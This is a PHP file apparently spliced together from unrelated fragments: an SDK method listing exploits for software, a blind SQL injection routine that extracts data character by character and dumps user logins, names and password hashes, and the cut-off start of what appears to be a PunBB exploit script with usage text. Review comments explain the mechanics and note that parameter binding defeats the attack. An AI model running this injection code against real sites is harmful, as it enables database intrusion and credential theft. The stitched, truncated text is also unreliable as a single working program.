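/**
 * Gets a list of exploits from this software.
 *
 * Builds an Exploit query object on the same Patrol client, sets
 * software_id and server_id as its defaults, and returns whatever
 * its all() call yields.
 *
 * @param array $scopes optional; currently not read by this method
 *
 * @return array List of PatrolSdk\Exploit
 *
 * @throws Exception when the software has no ID or no server ID
 */
public function exploits($scopes = [])
{
    // Loose falsy checks: null, 0, '' and '0' are all treated as "not set".
    if (!$this->id) {
        throw new Exception("The software has no ID, can't get exploits");
    }

    if (!$this->server_id) {
        throw new Exception("The software has no server ID, can't get exploits");
    }

    // Both identifiers are set as defaults before all() runs, so the
    // query is never issued without them.
    $exploit = new Exploit($this->patrol);
    $exploit->defaults(['software_id' => $this->id, 'server_id' => $this->server_id]);

    return $exploit->all();
}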
{
    // NOTE(review): the signature of this method is outside the excerpt; $sql is
    // presumably its parameter. It is spliced into the request below as a sub-query.
    $characters = str_split($this->latinString . $this->specCharString);
    $hash = '';
    $record_length = $this->getLength(1, '(' . $sql . ')');

    // One HTTP request is sent per (position, candidate character) pair; the
    // `continue` below does not leave the foreach, so a run always costs
    // $record_length * count($characters) requests. In the target's access log
    // that is a long burst of near-identical URLs whose parameter contains
    // "substring((" and differs only in the position and the quoted character.
    for ($i = 1; $i <= $record_length; $i++) {
        foreach ($characters as $char) {
            // The comparison is appended to the value carried in the URL. This only
            // yields an answer if the target places that value into its SQL text
            // unescaped; binding it as a query parameter on the server side removes
            // the condition this loop depends on.
            $injection = "1+and+substring((" . $sql . ")," . $i . ",1)='" . $char . "'";
            // Purpose of id1 (payload length + 5) is not visible here - TODO confirm.
            $id2 = strlen($injection) + 5;
            $param2 = '&id1=' . $id2;
            $url = $this->url . $injection . $param2;
            // The literal page text 'User exists' is the only thing read from the
            // response; $out is not used again in the visible code.
            if (strpos($out = file_get_contents($url), 'User exists') !== false) {
                $hash .= $char;
                continue;
            }
        }
    }

    return $hash;
}
}

$exploit = new Exploit();
// Calls left disabled by the author: column names/types of the users table,
// current database name, server version.
//$exploit->getBySQL("SELECT+string_agg(CONCAT(column_name,'=>',data_type),';')FROM+information_schema.columns+WHERE+table_name='users'");
//$exploit->getBySQL('SELECT+current_database()');
//$exploit->getBySQL('SELECT+version()');

// Prints login, first_name, last_name and the password hash for $i = 1..15;
// the first argument is presumably a row id or offset - defined outside this excerpt.
for ($i = 1; $i <= 15; $i++) {
    var_dump('------------------------------');
    var_dump($exploit->getCell($i, 'login'));
    var_dump($exploit->getCell($i, 'first_name'));
    var_dump($exploit->getCell($i, 'last_name'));
    var_dump($exploit->getPassHash($i));
    var_dump('------------------------------');
}
-------------------------------------------------------------------
Usage:   php [punbb.php] [host/path] [mode]
         php [punbb.php] [host/path] [save]
         php [punbb.php] [host/path] [NULL]
Example: php punbb.php localhost/punbb save
         php punbb.php localhost/punbb
NOTE: Don't add me on MSN Messenger
*/
// Script entry point: host/path and mode are taken straight from the command line.
// NOTE(review): $argv[1] and $argv[2] are read without an $argc check. The usage
// text above allows the mode to be omitted, in which case $argv[2] is an
// undefined index and $mymode ends up null.
$exploit = new Exploit();
$domain = $argv[1];
$mymode = $argv[2];
$exploit->starting();
// The return value of is_vulnerable() is discarded here, so exploiting() is
// reached unless is_vulnerable() ends the script itself - its body is outside
// this excerpt.
$exploit->is_vulnerable($domain);
$exploit->exploiting($domain, $mymode);

class Exploit
{
    // NOTE(review): this method continues past the end of the excerpt.
    function http_request($host, $data)
    {
        if (!($socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP))) {
            echo "socket_create() error!\r\n";
            exit;
        }
        if (!socket_set_option($socket, SOL_SOCKET, SO_BROADCAST, 1)) {
            echo "socket_set_option() error!\r\n";